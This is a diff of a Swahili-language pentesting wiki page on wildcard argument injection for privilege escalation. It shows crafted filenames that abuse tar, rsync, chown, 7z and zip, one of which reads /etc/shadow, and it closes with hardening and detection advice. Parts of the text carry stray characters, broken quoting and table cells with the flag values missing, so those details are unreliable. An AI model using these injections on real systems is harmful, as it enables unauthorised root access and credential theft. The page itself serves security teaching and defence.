diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index f7c7e6c8b..442af0c74 100644 --- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -1,60 +1,123 @@ +# Wildcards Spare Tricks + {{#include ../../banners/hacktricks-training.md}} -## chown, chmod +> Wildcard (pia inajulikana kama *glob*) **kuingiza hoja** hutokea wakati skripti yenye mamlaka inapoendesha binary ya Unix kama `tar`, `chown`, `rsync`, `zip`, `7z`, … kwa kutumia wildcard isiyo na nukuu kama `*`. +> Kwa sababu shell inapanua wildcard **kabla** ya kutekeleza binary, mshambuliaji ambaye anaweza kuunda faili katika directory ya kazi anaweza kuunda majina ya faili yanayoanza na `-` ili yaweze kutafsiriwa kama **chaguzi badala ya data**, kwa ufanisi akisafirisha bendera za kiholela au hata amri. +> Ukurasa huu unakusanya primitives muhimu zaidi, utafiti wa hivi karibuni na ugunduzi wa kisasa kwa mwaka 2023-2025. -Unaweza **kuonyesha mmiliki wa faili na ruhusa unazotaka nakala kwa faili zingine** +## chown / chmod + +Unaweza **kunakili mmiliki/kikundi au bits za ruhusa za faili yoyote** kwa kutumia bendera `--reference`: ```bash -touch "--reference=/my/own/path/filename" +# attacker-controlled directory +touch "--reference=/root/secret``file" # ← filename becomes an argument ``` -You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(combined attack)_\ -More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) - -## Tar - -**Teua amri za kiholela:** +Wakati root baadaye anatekeleza kitu kama: ```bash +chown -R alice:alice *.php +chmod -R 644 *.php +``` +`--reference=/root/secret``file` imeingizwa, ikisababisha *faili zote* zinazolingana kurithi umiliki/ruhusa za `/root/secret``file`. + +*PoC & chombo*: [`wildpwn`](https://github.com/localh0t/wildpwn) (shambulio lililounganishwa). +Tazama pia karatasi ya jadi ya DefenseCode kwa maelezo. + +--- + +## tar + +### GNU tar (Linux, *BSD, busybox-full) + +Teua amri za kiholela kwa kutumia kipengele cha **checkpoint**: +```bash +# attacker-controlled directory +echo 'echo pwned > /tmp/pwn' > shell.sh +chmod +x shell.sh touch "--checkpoint=1" touch "--checkpoint-action=exec=sh shell.sh" ``` -Unaweza kutumia hii kwa kutumia [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(shambulio la tar)_\ -Maelezo zaidi katika [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Mara tu root anapokimbia e.g. `tar -czf /root/backup.tgz *`, `shell.sh` inatekelezwa kama root. -## Rsync +### bsdtar / macOS 14+ -**Tekeleza amri zisizo na mipaka:** +`tar` ya kawaida kwenye macOS za hivi karibuni (zinazoegemea `libarchive`) *haitekelezi* `--checkpoint`, lakini bado unaweza kufikia utekelezaji wa msimbo kwa kutumia bendera **--use-compress-program** ambayo inakuwezesha kubaini compressor ya nje. ```bash -Interesting rsync option from manual: - --e, --rsh=COMMAND specify the remote shell to use ---rsync-path=PROGRAM specify the rsync to run on remote machine +# macOS example +touch "--use-compress-program=/bin/sh" ``` +Wakati skripti yenye mamlaka inapoendesha `tar -cf backup.tar *`, `/bin/sh` itaanzishwa. +--- + +## rsync + +`rsync` inakuwezesha kubadilisha shell ya mbali au hata binary ya mbali kupitia bendera za amri zinazaanza na `-e` au `--rsync-path`: ```bash -touch "-e sh shell.sh" +# attacker-controlled directory +touch "-e sh shell.sh" # -e => use instead of ssh ``` -Unaweza kutumia hii kwa kutumia [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(\_rsync \_attack)_\ -Maelezo zaidi katika [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930) +Ikiwa root baadaye anahifadhi saraka hiyo kwa `rsync -az * backup:/srv/`, bendera iliyoingizwa inazalisha shell yako upande wa mbali. -## 7z +*PoC*: [`wildpwn`](https://github.com/localh0t/wildpwn) (`rsync` mode). -Katika **7z** hata kutumia `--` kabla ya `*` (kumbuka kwamba `--` inamaanisha kwamba ingizo linalofuata haliwezi kut treated kama vigezo, hivyo ni njia za faili tu katika kesi hii) unaweza kusababisha kosa la kiholela kusoma faili, hivyo ikiwa amri kama ifuatayo inatekelezwa na root: +--- + +## 7-Zip / 7z / 7za + +Hata wakati skripti yenye mamlaka *inajihifadhi* kwa kuweka awali wildcard na `--` (kuzuia uchambuzi wa chaguo), muundo wa 7-Zip unasaidia **faili za orodha za faili** kwa kuweka awali jina la faili na `@`. Kuunganisha hiyo na symlink kunakuwezesha *kuhamasisha faili za kiholela*: ```bash -7za a /backup/$filename.zip -t7z -snl -p$pass -- * +# directory writable by low-priv user +cd /path/controlled +ln -s /etc/shadow root.txt # file we want to read +touch @root.txt # tells 7z to use root.txt as file list ``` -Na unaweza kuunda faili katika folda ambapo hii inatekelezwa, unaweza kuunda faili `@root.txt` na faili `root.txt` ikiwa ni **symlink** kwa faili unayotaka kusoma: +Ikiwa root anatekeleza kitu kama: ```bash -cd /path/to/7z/acting/folder -touch @root.txt -ln -s /file/you/want/to/read root.txt +7za a /backup/`date +%F`.7z -t7z -snl -- * ``` -Kisha, wakati **7z** inatekelezwa, itachukulia `root.txt` kama faili inayoshikilia orodha ya faili ambazo inapaswa kubana (hiyo ndiyo maana ya kuwepo kwa `@root.txt`) na wakati 7z inasoma `root.txt` itasoma `/file/you/want/to/read` na **kwa sababu maudhui ya faili hii si orodha ya faili, itatupa kosa** ikionyesha maudhui. +7-Zip itajaribu kusoma `root.txt` (→ `/etc/shadow`) kama orodha ya faili na itakataa, **ikiandika maudhui kwenye stderr**. -_Maelezo zaidi katika Write-ups ya sanduku la CTF kutoka HackTheBox._ +--- -## Zip +## zip -**Tekeleza amri zisizo na mipaka:** +`zip` inasaidia bendera `--unzip-command` ambayo inapitishwa *kama ilivyo* kwa shell ya mfumo wakati archive itajaribiwa: ```bash -zip name.zip files -T --unzip-command "sh -c whoami" +zip result.zip files -T --unzip-command "sh -c id" ``` +Inject the flag via a crafted filename and wait for the privileged backup script to call `zip -T` (test archive) on the resulting file. + +--- + +## Orodha ya ziada ya binaries zinazoweza kuathiriwa na wildcard injection (orodha ya haraka ya 2023-2025) + +Amri zifuatazo zimekuwa zikitumika vibaya katika CTFs za kisasa na mazingira halisi. Payload kila wakati huundwa kama *filename* ndani ya directory inayoweza kuandikwa ambayo baadaye itashughulikiwa kwa wildcard: + +| Binary | Flag to abuse | Effect | +| --- | --- | --- | +| `bsdtar` | `--newer-mtime=@` → arbitrary `@file` | Soma maudhui ya faili | +| `flock` | `-c ` | Tekeleza amri | +| `git` | `-c core.sshCommand=` | Utekelezaji wa amri kupitia git juu ya SSH | +| `scp` | `-S ` | Anzisha programu isiyo ya kawaida badala ya ssh | + +Hizi primitives ni za kawaida kidogo kuliko *tar/rsync/zip* classics lakini zina thamani ya kuangaliwa unapofanya uwindaji. + +--- + +## Ugunduzi & Uimarishaji + +1. **Zima shell globbing** katika scripts muhimu: `set -f` (`set -o noglob`) inazuia upanuzi wa wildcard. +2. **Nukuu au kimbia** hoja: `tar -czf "$dst" -- *` si *salama* — pendelea `find . -type f -print0 | xargs -0 tar -czf "$dst"`. +3. **Njia wazi**: Tumia `/var/www/html/*.log` badala ya `*` ili wahalifu wasiweze kuunda faili za ndugu zinazoh开始 na `-`. +4. **Haki ndogo**: Endesha kazi za backup/maintenance kama akaunti ya huduma isiyo na haki badala ya root inapowezekana. +5. **Ufuatiliaji**: Kanuni iliyojengwa awali ya Elastic *Potential Shell via Wildcard Injection* inatafuta `tar --checkpoint=*`, `rsync -e*`, au `zip --unzip-command` mara moja ikifuatwa na mchakato wa mtoto wa shell. Uchunguzi wa EQL unaweza kubadilishwa kwa EDR zingine. + +--- + +## Marejeleo + +* Elastic Security – Kanuni ya Potenshiali Shell kupitia Wildcard Injection Imegundulika (imepitiwa mara ya mwisho 2025) +* Rutger Flohil – “macOS — Tar wildcard injection” (Desemba 18 2024) + {{#include ../../banners/hacktricks-training.md}}